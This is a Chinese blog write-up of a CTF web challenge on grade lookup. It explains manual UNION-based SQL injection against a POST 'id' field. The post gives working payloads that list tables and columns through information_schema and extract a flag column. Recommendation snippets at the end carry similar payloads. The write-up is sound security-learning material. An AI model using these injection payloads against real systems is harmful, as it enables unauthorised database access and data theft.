ctf-web-成绩查询

最新推荐文章于 2024-04-26 21:09:14 发布
最新推荐文章于 2024-04-26 21:09:14 发布
阅读量1.1k 收藏 4
点赞数 2
分类专栏: ctf 文章标签: 网络安全 前端 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124138219
版权

题目:

打开网页:

 一个提交页面,按提示输入1,2,3能够得到三个成绩单表格:如1时:

 查看源代码:

 发现,表单使用post方式提交,并且name="id"

猜测使用SQL注入

首先检测闭合方式:

        分别post id=1' id=1"

        发现post id=1"时,正常,post id=1'时无响应

        应该是单引号 ' ' 闭合

再通过order by查询当前表列数:

        

        于是可以判断出当前表具有4列

查询显示位置:

        使用union select查询每一列数据显示位置

 判断当前数据库包含的表名:

        post

id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

 查询表fl4g里的列名:

id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

 查询列表fl4g对应skctf_flag列的数据:

id=-1' union select 1,2,3,skctf_flag from fl4g#

 得到结果

这里注意使用union select注入时,id不能是存在的数值,因为程序在展示数据的时候通常只会取结果集的第一行数据,如果是已存在的数值,则想要的数据不会存于第一行,就无法显示

榴莲 蛋挞
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctfquery:CTF数据查询命令行工具
05-19
ctfquery 查询CTF以获取特定信息。 用法 ctfquery [ -s SYM | -t TYPE_ID | -c TYPE_ID | -l LABEL | -v | -h ] <file> -s SYM搜索名为SYM的符号 -S TYPE_ID搜索类型为TYPE_ID所有符号 -t TYPE_ID搜索以TYPE_ID标识的类型 -c TYPE_ID用头顶用TYPE_ID标识的-c TYPE_ID解决typedef链 -l LABEL搜索名称为LABEL -v打印文件的CTF版本 -h打印帮助消息 建造 $ ninja 依存关系 例子 ...或最大进程ID的故事 握住我的手,我们要去旅行! 说,由于某种原因,我们完全了解内核符号pid_max ,该符号表示系统上的最大PID。 当然,一种方法是调查源,但是如果它不可用,而我们陷入一些随机的黑匣子故障转储中,该怎么办? ctf
HSCCTF 3th 2024 Web方向 题解wp
Jay17的博客
03-11 1453
HSCCTF 3th 2024 Web方向 题解wp
CTF——web安全(六)
最新发布
qq_45215609的博客
04-26 341
CTF——web安全(六) 题目一:成绩查询
Bugku Web CTF-学生成绩查询
No Title
12-16 1192
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
CTFweb篇-SQL注入(一)
weixin_44597701的博客
08-12 1405
基本函数和知识 基本数据库information_schema information_schema是一个数据库,放的是一些视图,在SQL文件中找不到。 其中具有表schemata(数据库名)、tables(表名)、columns(列名获字段名) schemata表中有schema_name来存储数据库名 在tables表中,table_schema和table_name来存储数据库名和表名 在columns表中,有table_schema、table_name、column_name 基本函数 user(
Bugku-CTF社工篇之简单的个人信息收集
weixin_30593443的博客
08-14 648
简单的个人信息收集 解题要点:压缩包伪加密、社工库查询 下载压缩包 发现有密码 先放到winhex里面看看 是个伪加密压缩包 将最后的09改为00(奇数表示加密,偶数表示未加密) 这里扩充一下压缩包伪加密的知识 压缩源文件数据区: 50 4B 03 04:这是头文件标记(0x04034b50) 14...
SQLi-CTF-master.zip
04-09
SQL注入(SQL Injection,简称SQLi)是一种常见的网络安全漏洞,主要出现在使用了不安全的SQL语句构建的应用程序中。...通过学习和实践,可以提升对网络安全的理解,并在CTF比赛中取得更好的成绩
zer0pts-CTF-2021:zer0pts CTF 2021
05-06
zer0pts CTF 2021 是一个网络安全竞赛,主要针对网络安全爱好者和专业人士,旨在提升参赛者在信息安全领域的...通过分析代码、模拟攻击、调试程序等方式,参赛者可以不断提升自己的安全技能,并在比赛中取得好成绩
tjctf-2015:TJCTF 2015 的文章
06-03
通过分析tjctf-2015-master中的内容,我们可以了解到CTF挑战的实际场景,学习如何发现和利用安全漏洞,以及提高在Web安全领域的实战能力。对于希望在网络安全领域发展的朋友,这是一个不可多得的学习平台。
hsctf-2015:为 HSCTF 2015 撰写的文章
06-03
3. **Web安全**:虽然标签中没有明确提及,但CTF比赛通常会涵盖Web安全领域。Java在Web开发中广泛使用,因此可能包含SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等经典Web漏洞的利用和防御方法。 4. **逆向...
CTF相关资料合集打包上传
03-02
CTF(Capture The Flag)是一种网络安全竞赛,参赛者通过解决各种技术挑战来获取虚拟“国旗”,这些挑战通常涉及网络攻防、...通过系统学习和实践这些材料,你将能够逐步提升自己的CTF技能,并在比赛中取得更好的成绩
Web学习之路(BUUCTF刷题之旅4)
AKAXPD的博客
02-10 2063
一、[BJDCTF2020]Easy MD5 打开后只有一个提交查询的界面,在源代码里没有找到任何东西。
BUUCTF WEB [GXYCTF2019]BabySQli
Y1da的博客
04-18 743
BUUCTF WEB [GXYCTF2019]BabySQli 手工注入 这里需要利用sqli的一个特性:在联合查询并不存在的数据时,联合查询会构造一个虚拟的数据 假设联合查询前表结构如下 id name password 1 tom 123456 此时执行联合查询 select * from 'users' where name='admin' union select 2,'admin','123'; 表结构将会变成 id name password 1
CTFshow web入门之信息收集(web1-web20)
小白的博客
05-10 643
得到一个IP地址或网址时第一步:查看源码第二步:网页上查找是否有有效信息第三步:查看是否存在说明文件rotobs.txt第四步:通过御剑或dirsearch扫描探测是否存在其它页面第五步:按照网页的框架信息查看是否存在测试文件或备份文件。
bugku ctf 成绩查询 解题思路
YouthBelief的博客
03-08 1064
0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/84.html 成绩查询 大概率sql注入 0x01 解题思路 1.1 根据提示输入1 2 3 测试正常数据 1 2 看来是根据id查询 1.2 测试是否报错(不产生报错) ' " ') ") % %) )) 等等 1.3 猜测sql语句为 select Math_score,English_score,Chinese_score from score_table where
ctf刷题笔记之sql注入-union注入|bugku CTF成绩查询
weixin_51614848的博客
08-18 1284
ctf刷题笔记
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 845
BUGKU CTF--web 基础{成绩查询}解题过程
CTF 简单sql
明月于心的博客
07-25 1228
针对网络安全实验室 注入关该题,写一下自己的思路 打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工注入 因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。 好了 ,进入正题 那我们就开始: 那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发...
CTF学习笔记——[BJDCTF2020]Easy MD5
Obs_cure的博客
08-18 658
一、[BJDCTF2020]Easy MD5 1.题目 2.解题步骤 题目是一个简简单单查询框。因为太忙好久没做题,之前某次试水看了一次WP,记得是在响应头有信息,摸过来看一下 这里一句SQL提示了注入的信息,首先是进行了MD5的运算 他会将输入的字符串进行原始的16字符二进制格式加密,然后返回结果,之后再向前看,与admin进行比对。 3.总结 4.参考资料 ...
ctf web 思维导图
12-18
CTF(Capture The Flag)是一种网络安全竞赛,其中的Web领域涉及到了网页应用程序的漏洞挖掘和利用。...掌握这些知识和技能能够帮助参赛者更好地分析和利用Web漏洞,从而在CTF比赛中取得优异的成绩

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值